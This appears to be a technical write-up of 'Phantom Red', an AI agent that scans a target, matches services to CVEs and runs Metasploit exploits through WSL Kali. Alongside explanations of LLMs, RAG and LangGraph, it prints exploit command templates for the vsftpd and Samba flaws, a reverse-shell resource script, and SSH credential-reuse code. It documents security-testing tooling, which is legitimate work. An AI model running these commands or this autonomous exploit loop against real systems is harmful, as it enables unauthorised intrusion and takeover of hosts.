Phantom Red

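Phantom Red is an AI-powered red team agent. You give it a target IP address, and it autonomously scans the target, matches the discovered services against known CVEs, plans an attack, and runs the exploits.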

Think of it as a junior pentester that never sleeps, never forgets a CVE, and asks you to review the plan before pulling the trigger.

The Big Picture

Before we dive deep, here’s the 10,000-foot view. Phantom Red is built from four major pieces that work together:

┌─────────────────────────────────────────────────────────────┐
│                        PHANTOM RED                          │
│                                                             │
│  ┌──────────┐   ┌──────────┐   ┌──────────┐   ┌────────┐  │
│  │   LLM    │   │   RAG    │   │  Agent   │   │ Tools  │  │
│  │ (Brain)  │   │ (Memory) │   │ (Logic)  │   │(Hands) │  │
│  │          │   │          │   │          │   │        │  │
│  │ Qwen 2.5 │   │ChromaDB  │   │LangGraph │   │ nmap   │  │
│  │  Coder   │   │ + embed  │   │ pipeline │   │  msf   │  │
│  │ via      │   │          │   │ 10 nodes │   │  wsl   │  │
│  │ Ollama   │   │30+ CVEs  │   │          │   │  curl  │  │
│  └──────────┘   └──────────┘   └──────────┘   └────────┘  │
│                                                             │
│         All connected by Python + FastAPI + React          │
└─────────────────────────────────────────────────────────────┘

Each piece has a specific job. Let’s understand them one by one, starting from the fundamentals.

Part 1 — The Brain

How the LLM Works

You already know neural networks — inputs, weights, activations, outputs. An LLM (Large Language Model) is exactly that, but trained on a huge amount of text. It learns one thing really well: given this sequence of tokens, what token comes next?

The Transformer Architecture (Quick Refresher)

Your Prompt (tokens)
         │
         ▼
┌────────────────────┐
│  Token Embeddings  │  ← Each word → high-dimensional vector
│  + Positional Enc  │  ← Tells model where each word sits
└────────────────────┘
         │
         ▼
┌────────────────────┐
│  Self-Attention    │  ← "How much should I focus on each
│  (Multi-Head)      │     other word when processing THIS word?"
└────────────────────┘
         │
         ▼
┌────────────────────┐
│  Feed Forward NN   │  ← Standard dense layers (MLP)
└────────────────────┘
         │
    × N layers (Transformer Blocks)
         │
         ▼
┌────────────────────┐
│   Output Logits    │  ← Scores for every token in vocabulary
└────────────────────┘
         │
         ▼
    Next Token (sampled from softmax distribution)

The model repeats this — predicting one token at a time — until it generates a complete response. That’s autoregressive generation.

Why Qwen 2.5 Coder?

Phantom Red uses Qwen 2.5 Coder running locally via Ollama. Here’s why:

Property                      Benefit
Code-focused training         Understands bash, msfconsole, Python
Runs locally via Ollama       No API costs, no data leaving your machine
Fast enough on consumer GPU   Good balance of speed vs quality
Open weights                  You can swap to llama3, mistral, etc.

How Ollama Works

Ollama is basically a local server that serves LLM models via a simple HTTP API. LangChain talks to it like this:

# engine/agents.py
from langchain_ollama import OllamaLLM

self.llm = OllamaLLM(model="qwen2.5-coder", temperature=0.1)

temperature=0.1 means the model is conservative: it almost always picks the highest-probability tokens rather than getting creative. For security tool planning, you want predictable, repeatable output, not imaginative output.
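To see why a low temperature makes the output more predictable, here is a minimal sketch of temperature-scaled softmax. The logits are made-up numbers for three candidate tokens, and the function name is just for illustration; this is not how Ollama implements sampling internally.

```python
import math

def softmax_with_temperature(logits, temperature=1.0):
    """Turn raw scores into probabilities; a lower temperature sharpens the distribution."""
    if temperature <= 0:
        raise ValueError("temperature must be positive")
    scaled = [x / temperature for x in logits]
    peak = max(scaled)  # subtract the max for numerical stability
    exps = [math.exp(x - peak) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]

logits = [2.0, 1.0, 0.5]  # hypothetical scores for three candidate tokens
print(softmax_with_temperature(logits, temperature=1.0))
print(softmax_with_temperature(logits, temperature=0.1))
```

At temperature 1.0 the top token gets a bit under two thirds of the probability mass; at 0.1 it gets almost all of it, which is why sampling becomes nearly repeatable.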

When the agent calls the LLM, it sends a carefully crafted prompt and gets back structured text:

Prompt:
  "You are an expert penetration tester.
   Services found: vsftpd 2.3.4 on port 21, Samba 3.0.20 on port 445...
   RAG vulnerabilities: CVE-2011-2523 vsftpd backdoor...
   Rank the top 3 attack vectors."

LLM Response:
  "1. vsftpd 2.3.4 backdoor (CVE-2011-2523) - CRITICAL...
   2. Samba usermap_script (CVE-2007-2447) - HIGH...
   ..."
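Assembling a prompt like the one above is plain string formatting. The sketch below assumes the services arrive as dicts with port and version keys (the shape used later in this article); the function name build_analysis_prompt is hypothetical and the wording is only modeled on the example prompt.

```python
def build_analysis_prompt(services, vulnerabilities, top_n=3):
    """Assemble an analyst prompt from parsed services and RAG hits."""
    service_text = ", ".join(
        f"{s['version']} on port {s['port']}" for s in services
    )
    vuln_text = "; ".join(vulnerabilities)
    return (
        "You are an expert penetration tester.\n"
        f"Services found: {service_text}\n"
        f"RAG vulnerabilities: {vuln_text}\n"
        f"Rank the top {top_n} attack vectors."
    )

prompt = build_analysis_prompt(
    services=[
        {"port": "21", "version": "vsftpd 2.3.4"},
        {"port": "445", "version": "Samba 3.0.20"},
    ],
    vulnerabilities=["CVE-2011-2523 vsftpd backdoor"],
)
print(prompt)
```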

Part 2 — The Memory

How RAG Works

Here’s the problem with a plain LLM: it’s frozen in time. It was trained up to some date and doesn’t know about new CVEs, and it can hallucinate exploit details it’s not sure about.

RAG (Retrieval-Augmented Generation) fixes this by giving the model a searchable knowledge base at runtime. Instead of relying purely on weights, the model looks things up before answering.

The RAG Pipeline

                    ┌─────────────────────┐
                    │   Query: "samba 3.0  │
                    │   exploit"           │
                    └──────────┬──────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  1. EMBED the query            │
              │                                │
              │  "samba 3.0 exploit"           │
              │         │                      │
              │         ▼                      │
              │  [0.23, -0.87, 0.44, ...]      │
              │  (384-dimensional vector)      │
              └────────────────────────────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  2. SEARCH ChromaDB            │
              │                                │
              │  Compare query vector against  │
              │  all stored document vectors   │
              │  using cosine similarity       │
              │                                │
              │  [doc1] similarity: 0.91  ← ✓ │
              │  [doc2] similarity: 0.87  ← ✓ │
              │  [doc3] similarity: 0.23       │
              │  [doc4] similarity: 0.12       │
              └────────────────────────────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  3. RETRIEVE top matches       │
              │                                │
              │  CVE-2007-2447: Samba          │
              │  usermap_script command        │
              │  injection via MS-RPC...       │
              │                                │
              │  Metadata:                     │
              │  - msf_module: exploit/multi/  │
              │    samba/usermap_script        │
              │  - payload: cmd/unix/reverse   │
              │  - port: 445                   │
              └────────────────────────────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  4. AUGMENT the LLM prompt     │
              │                                │
              │  "Here are relevant CVEs:      │
              │   [retrieved docs]             │
              │   Now plan the attack..."      │
              └────────────────────────────────┘

What is an Embedding?

An embedding is a way to convert text into a list of numbers (a vector) that captures the meaning of the text. Similar meanings end up as vectors that point in similar directions in high-dimensional space.

"vsftpd backdoor"   →  [0.21, -0.83, 0.44, 0.12, ...]
"ftp version 2.3.4" →  [0.19, -0.79, 0.41, 0.15, ...]  ← similar!
"apache web server" →  [0.91,  0.23, -0.55, 0.67, ...] ← different

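ChromaDB’s default embedding function uses the all-MiniLM-L6-v2 sentence-transformers model to compute these embeddings, which is where the 384 dimensions come from. When you search, it embeds your query and returns the stored documents whose embeddings are closest. One caveat: Chroma collections use squared L2 distance unless you request cosine when creating the collection, so the cosine similarity framing assumes that setting.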
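Cosine similarity itself is only a few lines of arithmetic. This sketch reuses the first four components of the example vectors above; real embeddings have 384 components, so the exact numbers here are purely illustrative.

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0  # convention for zero vectors
    return dot / (norm_a * norm_b)

vsftpd = [0.21, -0.83, 0.44, 0.12]   # "vsftpd backdoor" (truncated)
ftp    = [0.19, -0.79, 0.41, 0.15]   # "ftp version 2.3.4" (truncated)
apache = [0.91, 0.23, -0.55, 0.67]   # "apache web server" (truncated)

print(cosine_similarity(vsftpd, ftp))     # close to 1: similar direction
print(cosine_similarity(vsftpd, apache))  # negative: different direction
```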

The Vulnerability Database

Phantom Red’s RAG database (engine/rag_engine.py) is pre-loaded with 30+ real CVEs, each stored with rich metadata:

# Simplified from rag_engine.py
VULN_DB = [
    {
        "id": "CVE-2011-2523",
        "desc": "vsftpd 2.3.4 backdoor - connects to port 6200, gives root shell",
        "meta": {
            "service": "ftp",
            "port": "21",
            "msf_module": "exploit/unix/ftp/vsftpd_234_backdoor",
            "arch": "cmd",
            "payload": "payload/cmd/unix/interact",
            "command_template": 'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; ...'
        }
    },
    {
        "id": "CVE-2007-2447",
        "desc": "Samba 3.0.0-3.0.25rc3 username map script injection via MS-RPC",
        "meta": {
            "service": "samba",
            "port": "445",
            "msf_module": "exploit/multi/samba/usermap_script",
            # ...
        }
    },
    # 28 more CVEs...
]

At startup, all entries are embedded and stored in ChromaDB at data/vuln_db/. This is persistent — the database survives restarts so it doesn’t re-embed everything every time.

# engine/rag_engine.py
import chromadb
from chromadb.utils import embedding_functions

class VulnRAGEngine:
    def __init__(self):
        # PersistentClient keeps the collection on disk under data/vuln_db
        self.client = chromadb.PersistentClient(path="data/vuln_db")
        self.collection = self.client.get_or_create_collection(
            name="vulnerabilities",
            embedding_function=embedding_functions.DefaultEmbeddingFunction()
        )
        self._auto_populate()  # Only adds missing entries

    def query_vulnerabilities(self, query_text, n_results=3):
        # Chroma embeds query_text and returns the n_results nearest documents
        results = self.collection.query(
            query_texts=[query_text],
            n_results=n_results
        )
        return results
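The dict that collection.query() returns holds one inner list per query text, which is awkward to loop over. Here is a minimal sketch that flattens it into one record per hit. The helper name flatten_query_results and the sample dict are hypothetical; the sample is hand-written in the shape Chroma returns (ids, documents, metadatas, distances) so the code runs without a database.

```python
def flatten_query_results(results):
    """Convert Chroma's list-of-lists result into one dict per hit (first query only)."""
    ids = results["ids"][0]
    docs = results["documents"][0]
    metas = results["metadatas"][0]
    dists = results["distances"][0]
    return [
        {"id": i, "text": d, "meta": m or {}, "distance": dist}
        for i, d, m, dist in zip(ids, docs, metas, dists)
    ]

# Hand-written sample shaped like a Chroma query result (values are illustrative)
sample = {
    "ids": [["CVE-2007-2447", "CVE-2011-2523"]],
    "documents": [["Samba username map script injection", "vsftpd 2.3.4 backdoor"]],
    "metadatas": [[{"port": "445"}, {"port": "21"}]],
    "distances": [[0.21, 0.93]],
}

for hit in flatten_query_results(sample):
    print(hit["id"], hit["meta"].get("port"), hit["distance"])
```

Smaller distance means a closer match, so the first hit is the best one.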

Part 3 — The Nervous System

How the Agent Works (LangGraph)

An agent is an AI system that can take actions, observe results, and decide what to do next. It’s not just a prompt → response; it’s a loop.

Agents vs Chains

CHAIN (simple, linear):
  Input → Prompt → LLM → Output
  (No decisions, no loops, no tools)

AGENT (smart, adaptive):
  Input → Think → Act → Observe → Think → Act → Observe → ... → Done
  (Can use tools, can loop, makes decisions)

What is LangGraph?

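LangGraph is a library for building agents as state machines (directed graphs). Instead of one big loop, you define nodes (functions that each do one job), edges (which node runs next), and a shared state that every node reads and updates.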

This gives you a deterministic, debuggable agent where you control exactly what happens at each step.

                        ┌─────────┐
           target_ip ──►│  RECON  │  nmap -sV scan
                        └────┬────┘
                             │ services discovered
                             ▼
                    ┌────────────────┐
                    │HTTP_FINGERPRINT│  curl headers, CMS detect
                    └───────┬────────┘
                            │ web tech stack
                            ▼
                    ┌───────────────┐
                    │  MSF_SEARCH   │  msfconsole search
                    └───────┬───────┘
                            │ available modules
                            ▼
                    ┌───────────────┐
                    │   RESEARCH    │  ChromaDB RAG query
                    └───────┬───────┘
                            │ matched CVEs + metadata
                            ▼
                    ┌───────────────┐
                    │   CVE_INTEL   │  NVD + ExploitDB lookup
                    └───────┬───────┘
                            │ live CVE data (read-only)
                            ▼
                    ┌───────────────┐
                    │    ANALYZE    │  LLM ranks entry points
                    └───────┬───────┘
                            │ attack surface analysis
                            ▼
                    ┌───────────────┐
                    │   PLANNER     │  Build exploit commands
                    └───────┬───────┘
                            │ ordered exploit plan
                            ▼
                    ┌───────────────┐
                    │   VALIDATE    │  RAG checks commands
                    └───────┬───────┘
                            │ validated command list
                            ▼
                    ┌───────────────┐
                    │    EXECUTE    │  Run in WSL Kali
                    └───────┬───────┘
                            │ shell obtained? → exit early
                            ▼
                    ┌───────────────┐
                    │  CRED_REUSE   │  SSH/Telnet with found creds
                    └───────┬───────┘
                            │
                            ▼
                         DONE ✓

The Shared State

Every node reads from and writes to a shared AgentState dictionary. Think of it as a baton being passed in a relay race:

# engine/agents.py (simplified)
from typing import Dict, List, TypedDict

class AgentState(TypedDict):
    target: str                      # "192.168.72.150"
    kali_ip: str                     # "192.168.72.1"
    recon_result: str                # raw nmap output
    services: List[Dict]             # parsed [{port, service, version}]
    http_fingerprint: Dict           # {url, server, cms, frameworks}
    vulnerabilities: List[str]       # RAG matched CVE descriptions
    vuln_metadata: List[Dict]        # RAG metadata (modules, CVEs)
    msf_candidates: List[Dict]       # live msfconsole search results
    cve_research: List[Dict]         # NVD + ExploitDB data
    analyst_cve_findings: str        # human analyst notes
    analysis: str                    # LLM attack surface summary
    exploit_plan: str                # LLM generated commands
    validated_commands: List[str]    # checked, safe-to-run commands
    executed_commands: List[Dict]    # run results + outputs
    discovered_creds: List[Dict]     # [{user, password, source}]
    errors: List[str]

Each node is just a function that takes the state and returns a dict of updates:

# engine/agents.py (simplified)
def recon_node(self, state: AgentState) -> Dict:
    target = state["target"]

    # Run nmap
    result = self.nmap_tool.scan(target)
    services = self._parse_services(result)

    return {
        "recon_result": result,
        "services": services
    }

LangGraph takes care of merging these updates back into the shared state automatically.
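If the merge step feels like magic, this plain-Python sketch mimics the idea for a linear pipeline: call each node, then fold its returned dict into the state. It is an analogy under simplifying assumptions, not LangGraph's implementation, and the two fake nodes are stand-ins invented for the demo.

```python
from typing import Callable, Dict, List

def run_linear_pipeline(nodes: List[Callable[[Dict], Dict]], state: Dict) -> Dict:
    """Call each node in order and merge its partial update into the state."""
    state = dict(state)  # copy so the caller's dict is left untouched
    for node in nodes:
        updates = node(state)
        state.update(updates)  # keys the node did not return stay as they were
    return state

def fake_recon(state: Dict) -> Dict:
    # Stand-in for the real recon node: pretend nmap found one service
    return {"services": [{"port": "21", "service": "ftp"}]}

def fake_research(state: Dict) -> Dict:
    # Reads what the previous node wrote
    return {"vulnerabilities": [f"candidate for {s['service']}" for s in state["services"]]}

final = run_linear_pipeline([fake_recon, fake_research], {"target": "192.168.72.150"})
print(final)
```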

Building the Graph

# engine/agents.py (simplified)
from langgraph.graph import StateGraph, END

graph = StateGraph(AgentState)

# Add nodes
graph.add_node("recon",            self.recon_node)
graph.add_node("http_fingerprint", self.http_fingerprint_node)
graph.add_node("msf_search",       self.msf_search_node)
graph.add_node("research",         self.research_node)
graph.add_node("cve_intel",        self.cve_intel_node)
graph.add_node("analyze",          self.analyze_node)
graph.add_node("planner",          self.planner_node)
graph.add_node("validate",         self.rag_validate_node)
graph.add_node("execute",          self.execution_node)
graph.add_node("cred_reuse",       self.credential_reuse_node)

# Add edges (define execution order)
graph.add_edge("recon",            "http_fingerprint")
graph.add_edge("http_fingerprint", "msf_search")
graph.add_edge("msf_search",       "research")
graph.add_edge("research",         "cve_intel")
graph.add_edge("cve_intel",        "analyze")
graph.add_edge("analyze",          "planner")
graph.add_edge("planner",          "validate")
graph.add_edge("validate",         "execute")
graph.add_edge("execute",          "cred_reuse")
graph.add_edge("cred_reuse",       END)  # finish after the last node

# Set entry point
graph.set_entry_point("recon")

# Compile
self.app = graph.compile()

# Run the whole pipeline from an initial state
result = self.app.invoke(initial_state)

LangGraph walks the graph, calling each node in order, passing state along. Clean, debuggable, and modular.

Part 4 — The Hands

How Tools Work

An AI agent without tools is just a chatbot. Tools are what let it take real actions in the world — run commands, search databases, call APIs.

In Phantom Red, the tools are Python functions that the agent nodes call directly. Here are the main ones:

Tool 1: WSL Command Execution (engine/tools.py)

import subprocess
from typing import Optional

class WSLTool:
    def run_command(self, command: str, distro: str = "kali-linux",
                    timeout: Optional[int] = None) -> str:
        """
        Runs a command inside WSL2 Kali Linux.

        Why WSL? Metasploit, nmap, and exploit tools run on Linux.
        Phantom Red itself runs on Windows, so we bridge via WSL2.
        """

        # Build: wsl -d kali-linux -- bash -c "..."
        full_cmd = ["wsl", "-d", distro, "--", "bash", "-c", command]

        # Passing a list (no shell=True) avoids a second layer of Windows quoting
        result = subprocess.run(
            full_cmd,
            capture_output=True,
            text=True,
            timeout=timeout
        )
        return result.stdout + result.stderr

Windows (Python) ──── subprocess ────► WSL2 Kali Linux
                                             │
                                        nmap / msfconsole / curl
                                             │
                                        stdout/stderr ◄─────────
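One thing the simplified tool glosses over is what happens when a command hangs or the binary is missing. A minimal sketch of defensive handling, assuming you want a readable marker string back instead of an exception; run_with_timeout is a hypothetical helper, and the demo runs the current Python interpreter instead of wsl so it works on any machine.

```python
import subprocess
import sys

def run_with_timeout(argv, timeout=None):
    """Run a command and return its combined output, or a marker string on failure."""
    try:
        result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return f"[timeout after {timeout}s]"
    except FileNotFoundError:
        return f"[command not found: {argv[0]}]"
    return result.stdout + result.stderr

# Demo with the current interpreter as a stand-in for the wsl binary
print(run_with_timeout([sys.executable, "-c", "print('hello from child')"], timeout=30))
print(run_with_timeout([sys.executable, "-c", "import time; time.sleep(5)"], timeout=0.5))
```

subprocess.run kills the child process when the timeout expires, so a stuck msfconsole session would not linger under this pattern.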

Tool 2: Nmap Scanner

class NmapTool:
    def scan(self, target: str) -> str:
        """
        -sV: detect service versions
        -F:  fast scan (100 common ports)
        -T4: aggressive timing
        """
        cmd = f"nmap -sV -F -T4 {target}"
        return self.wsl.run_command(cmd, timeout=120)

PORT    STATE  SERVICE     VERSION
21/tcp  open   ftp         vsftpd 2.3.4
22/tcp  open   ssh         OpenSSH 4.7p1
139/tcp open   netbios-ssn Samba 3.0.20-Debian
445/tcp open   netbios-ssn Samba 3.0.20-Debian
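Turning that text into the structured services list takes one regular expression. The article references a _parse_services helper without showing it, so treat the parse_services function below as a hypothetical stand-in that handles only the simple "open" lines shown above.

```python
import re

# Matches lines like: 21/tcp  open   ftp   vsftpd 2.3.4
NMAP_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_services(nmap_output):
    """Extract port, service, and version from nmap -sV table rows."""
    services = []
    for line in nmap_output.splitlines():
        match = NMAP_LINE.match(line.strip())
        if match:
            port, _proto, service, version = match.groups()
            services.append({"port": port, "service": service, "version": version.strip()})
    return services

sample = """PORT    STATE  SERVICE     VERSION
21/tcp  open   ftp         vsftpd 2.3.4
22/tcp  open   ssh         OpenSSH 4.7p1
139/tcp open   netbios-ssn Samba 3.0.20-Debian
445/tcp open   netbios-ssn Samba 3.0.20-Debian
"""

for svc in parse_services(sample):
    print(svc)
```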

Tool 3: CVE Research (engine/cve_research.py)

import requests
from typing import Dict, List

def search_nvd(service_name: str, version: str) -> List[Dict]:
    """Queries the National Vulnerability Database API."""
    url = "https://services.nvd.nist.gov/rest/json/cves/2.0"
    params = {
        "keywordSearch": f"{service_name} {version}",
        "resultsPerPage": 10
    }
    response = requests.get(url, params=params, timeout=30)
    response.raise_for_status()  # fail loudly on HTTP errors or rate limiting
    return parse_cve_data(response.json())  # parse_cve_data: helper not shown here

def search_exploitdb(service_name: str) -> List[Dict]:
    """Searches ExploitDB for public exploits."""
    url = "https://www.exploit-db.com/search"
    params = {"q": service_name, "type": "local,remote,webapps"}
    ...

These give real-time data to complement the RAG database — important for new CVEs that weren’t in the training data.
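The parse_cve_data helper is not shown in the article, so here is a hedged sketch of what such a parser might look like. It assumes the NVD 2.0 response layout (a top-level vulnerabilities list whose items wrap a cve object with descriptions and metrics) and reads every field defensively. The function name and the trimmed sample payload are hypothetical.

```python
def parse_cve_data_sketch(payload):
    """Pull id, English description, and a CVSS base score out of an NVD-style payload."""
    findings = []
    for item in payload.get("vulnerabilities", []):
        cve = item.get("cve", {})
        description = next(
            (d.get("value", "") for d in cve.get("descriptions", []) if d.get("lang") == "en"),
            "",
        )
        score = None
        # Prefer the newest CVSS version that is present
        for key in ("cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
            metrics = cve.get("metrics", {}).get(key)
            if metrics:
                score = metrics[0].get("cvssData", {}).get("baseScore")
                break
        findings.append({"id": cve.get("id"), "description": description, "cvss": score})
    return findings

# Hand-written, heavily trimmed payload for the demo (values are illustrative)
sample_payload = {
    "vulnerabilities": [
        {
            "cve": {
                "id": "CVE-2011-2523",
                "descriptions": [{"lang": "en", "value": "vsftpd 2.3.4 contains a backdoor"}],
                "metrics": {"cvssMetricV2": [{"cvssData": {"baseScore": 10.0}}]},
            }
        }
    ]
}

print(parse_cve_data_sketch(sample_payload))
```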

Part 5 — The Full Pipeline

Step by Step: What Happens When You Run Phantom Red

Step 1: RECON Node

# Input: target = "192.168.72.150"
# Action: nmap -sV -F -T4 192.168.72.150

# Output:
services = [
    {"port": "21",  "service": "ftp",         "version": "vsftpd 2.3.4"},
    {"port": "22",  "service": "ssh",          "version": "OpenSSH 4.7p1"},
    {"port": "139", "service": "netbios-ssn",  "version": "Samba 3.0.20"},
    {"port": "445", "service": "microsoft-ds", "version": "Samba 3.0.20"},
    {"port": "80",  "service": "http",         "version": "Apache 2.2.8"},
    # ... more services
]

Step 2: HTTP_FINGERPRINT Node

# For port 80:
# Action: curl -I http://192.168.72.150

# Output:
http_fingerprint = {
    "url": "http://192.168.72.150",
    "server": "Apache/2.2.8 (Ubuntu)",
    "cms": "Mutillidae",   # detected from page body
    "frameworks": ["PHP/5.2.4"]
}

Step 3: MSF_SEARCH Node

# For each service, runs inside WSL:
# msfconsole -q -x "search vsftpd; exit"

# Parses output:
msf_candidates = [
    {
        "module": "exploit/unix/ftp/vsftpd_234_backdoor",
        "rank": "excellent",
        "description": "VSFTPD v2.3.4 Backdoor Command Execution"
    },
    ...
]

Step 4: RESEARCH Node (RAG Magic)

This is where RAG shines. For each service, the agent builds a query and searches ChromaDB:

# Query: "ftp vsftpd 2.3.4 exploit vulnerability"
# ChromaDB returns (by embedding similarity):

vulnerabilities = [
    "CVE-2011-2523: vsftpd 2.3.4 backdoor - contains a malicious backdoor...",
    "CVE-2015-3306: ProFTPD mod_copy unauthenticated file copy...",
]

vuln_metadata = [
    {
        "id": "CVE-2011-2523",
        "msf_module": "exploit/unix/ftp/vsftpd_234_backdoor",
        "command_template": 'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; ...'
    }
]

Key filter: Results are filtered by port. If the RAG returns a web exploit but only FTP is open, it gets dropped.
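The port filter can be sketched in a few lines. This assumes each metadata entry carries a port field as a string, like the entries in the vulnerability database above; filter_by_open_ports is a hypothetical name, not the function in agents.py.

```python
def filter_by_open_ports(vuln_metadata, services):
    """Keep only RAG hits whose port is actually open on the target."""
    open_ports = {str(s["port"]) for s in services}
    return [m for m in vuln_metadata if str(m.get("port")) in open_ports]

services = [{"port": "21", "service": "ftp", "version": "vsftpd 2.3.4"}]
rag_hits = [
    {"id": "CVE-2011-2523", "port": "21"},
    {"id": "CVE-2007-2447", "port": "445"},  # Samba hit, but 445 is not open here
]

print(filter_by_open_ports(rag_hits, services))
```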

Step 5: CVE_INTEL Node

Fetches live data from NVD and ExploitDB for analyst review. This is read-only — it doesn’t affect execution, it’s for a human to review.

Step 6: ANALYZE Node (LLM Reasoning)

Prompt:

You are an expert penetration tester analyzing a target system.

TARGET: 192.168.72.150

SERVICES FOUND:
- 21/tcp vsftpd 2.3.4
- 22/tcp OpenSSH 4.7p1
- 445/tcp Samba 3.0.20

RAG VULNERABILITIES:
- CVE-2011-2523: vsftpd 2.3.4 backdoor (cmd shell, port 21)
- CVE-2007-2447: Samba usermap_script injection (port 445)

AVAILABLE MSF MODULES:
- exploit/unix/ftp/vsftpd_234_backdoor [excellent]
- exploit/multi/samba/usermap_script [excellent]

Rank the top 3 attack vectors by exploitability and reliability.

LLM Response:

ATTACK SURFACE ANALYSIS:

1. vsftpd 2.3.4 Backdoor (CVE-2011-2523) — CRITICAL
   Port 21 is open. vsftpd 2.3.4 contains a hardcoded backdoor
   triggered by ':)' in username. Metasploit module is rated excellent.
   Success rate: very high on unpatched targets.

2. Samba usermap_script (CVE-2007-2447) — HIGH
   Port 445 open with Samba 3.0.20 (vulnerable range: 3.0.0-3.0.25rc3).
   Command injection via MS-RPC. Excellent Metasploit module.

3. Apache mod_ssl OpenFuck (CVE-2002-0082) — MEDIUM
   Port 443 detection needed. Buffer overflow, older, less reliable.

Step 7: PLANNER Node

PRIORITY 1: Analyst-pasted commands (user knows best)
PRIORITY 2: RAG template commands (tested, verified metadata)
PRIORITY 3: LLM-suggested commands (creative but needs validation)

# Template:
'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS {target}; ..."'

# After substitution:
'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.72.150; ..."'
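Here is a minimal sketch of that substitution step, assuming placeholders always look like {name}. It uses a regex instead of str.format so that a missing value leaves the placeholder in place (where a later check can catch it) rather than raising KeyError. Both function names are hypothetical.

```python
import re

PLACEHOLDER = re.compile(r"\{(\w+)\}")

def fill_template(template, values):
    """Replace {name} placeholders; names without a value are left untouched."""
    return PLACEHOLDER.sub(lambda m: str(values.get(m.group(1), m.group(0))), template)

def unresolved_placeholders(command):
    """Return the names of any placeholders still present in the command."""
    return PLACEHOLDER.findall(command)

template = "use exploit/multi/samba/usermap_script; set RHOSTS {target}; set LHOST {kali_ip}"
partial = fill_template(template, {"target": "192.168.72.150"})

print(partial)
print(unresolved_placeholders(partial))
```

The second print shows that kali_ip was never filled in, which is exactly the situation the VALIDATE step rejects.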

Some exploits use Metasploit resource scripts (.rc files) to avoid shell escaping issues:

# RC file content (written to Kali via WSL):
"""
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.72.150
set LHOST 192.168.72.1
set PAYLOAD cmd/unix/reverse
run
"""

# Command:
"msfconsole -r /tmp/samba_exploit.rc"

Step 8: VALIDATE Node

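def rag_validate_node(self, state):
    validated, errors = [], []
    vuln_metadata = state["vuln_metadata"]

    # exploit_plan_commands: commands parsed out of the plan (parsing not shown)
    for cmd in exploit_plan_commands:

        # Rule 1: Analyst commands pass through UNCHANGED
        if cmd.is_analyst_command:
            validated.append(cmd)
            continue

        # Rule 2: Reject unresolved placeholders
        if "{target}" in cmd or "{kali_ip}" in cmd:
            errors.append(f"Unresolved placeholder in: {cmd}")
            continue

        # Rule 3: Check against RAG metadata
        if has_invalid_option(cmd, vuln_metadata):
            # e.g., CMD= is marked invalid for this module
            cmd = remove_invalid_option(cmd)

        validated.append(cmd)

    # Return updates so they get merged back into the shared state
    return {"validated_commands": validated, "errors": state["errors"] + errors}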

Step 9: EXECUTE Node

SUCCESS_PATTERNS = [
    r"session \d+ opened",   # Metasploit session
    r"meterpreter session",   # Meterpreter shell
    r"uid=\d+\(",             # Linux UID (shell obtained)
    r"spawning shell",        # Generic shell spawn
]

FAIL_PATTERNS = [
    r"exploit completed, but no session",
    r"connection refused",
    r"no route to host",
]

If uid=0(root) appears in output — success, stop all further commands. The agent got what it came for.
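A sketch of how the classification could work with patterns like these. The patterns are lowercase, so this version matches case-insensitively and checks success before failure; both choices are assumptions, as is the classify_output name.

```python
import re

SUCCESS_PATTERNS = [
    r"session \d+ opened",
    r"meterpreter session",
    r"uid=\d+\(",
    r"spawning shell",
]

FAIL_PATTERNS = [
    r"exploit completed, but no session",
    r"connection refused",
    r"no route to host",
]

def classify_output(output):
    """Label tool output as 'success', 'failed', or 'unknown'."""
    for pattern in SUCCESS_PATTERNS:
        if re.search(pattern, output, re.IGNORECASE):
            return "success"
    for pattern in FAIL_PATTERNS:
        if re.search(pattern, output, re.IGNORECASE):
            return "failed"
    return "unknown"

print(classify_output("[*] Command shell session 1 opened (192.168.72.1:4444 -> 192.168.72.150:6200)"))
print(classify_output("[*] Exploit completed, but no session was created."))
print(classify_output("uid=0(root) gid=0(root)"))
```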

Step 10: CRED_REUSE Node

If credentials were discovered in exploit output (e.g., from a database dump or /etc/passwd), the agent tries them on SSH and Telnet:

def credential_reuse_node(self, state):
    target = state["target"]
    for cred in state["discovered_creds"]:
        # Try SSH
        result = self.wsl.run_command(
            f'sshpass -p "{cred["password"]}" ssh {cred["user"]}@{target} "id"'
        )
        if "uid=" in result:
            self._log(f"SSH login succeeded: {cred['user']}@{target}")
    return {}  # no state updates in this simplified version
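Passwords pulled from a dump can contain quotes, spaces, or shell metacharacters, and pasting them straight into a bash -c string will break the command (or worse). A minimal sketch of a safer builder using shlex.quote from the standard library; build_ssh_check is a hypothetical helper, not part of the original code.

```python
import shlex

def build_ssh_check(user, password, target):
    """Build an sshpass command line with every untrusted value shell-quoted."""
    return "sshpass -p {} ssh {} id".format(
        shlex.quote(password),
        shlex.quote(f"{user}@{target}"),
    )

cmd = build_ssh_check("msfadmin", "pa ss'word; rm -rf /", "192.168.72.150")
print(cmd)
print(shlex.split(cmd))  # shows how a POSIX shell would tokenize it
```

After quoting, the whole password arrives as a single argument to sshpass, whatever characters it contains.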

Part 6 — The Code Explained

How Libraries Are Used Together

phantom_red/
│
├── main.py               ← CLI: python main.py 192.168.72.150
│    └── PhantomEngine.run()
│
├── api.py                ← FastAPI server (HTTP/SSE interface)
│    ├── POST /scan       → PhantomEngine.run()
│    ├── POST /execute    → PhantomEngine.execute_plan()
│    ├── GET  /stream     → Server-Sent Events (live logs)
│    └── POST /cve/search → cve_research.search_nvd()
│
└── engine/
     ├── agents.py        ← LangGraph StateGraph (10 nodes)
     │    ├── OllamaLLM   (langchain-ollama)
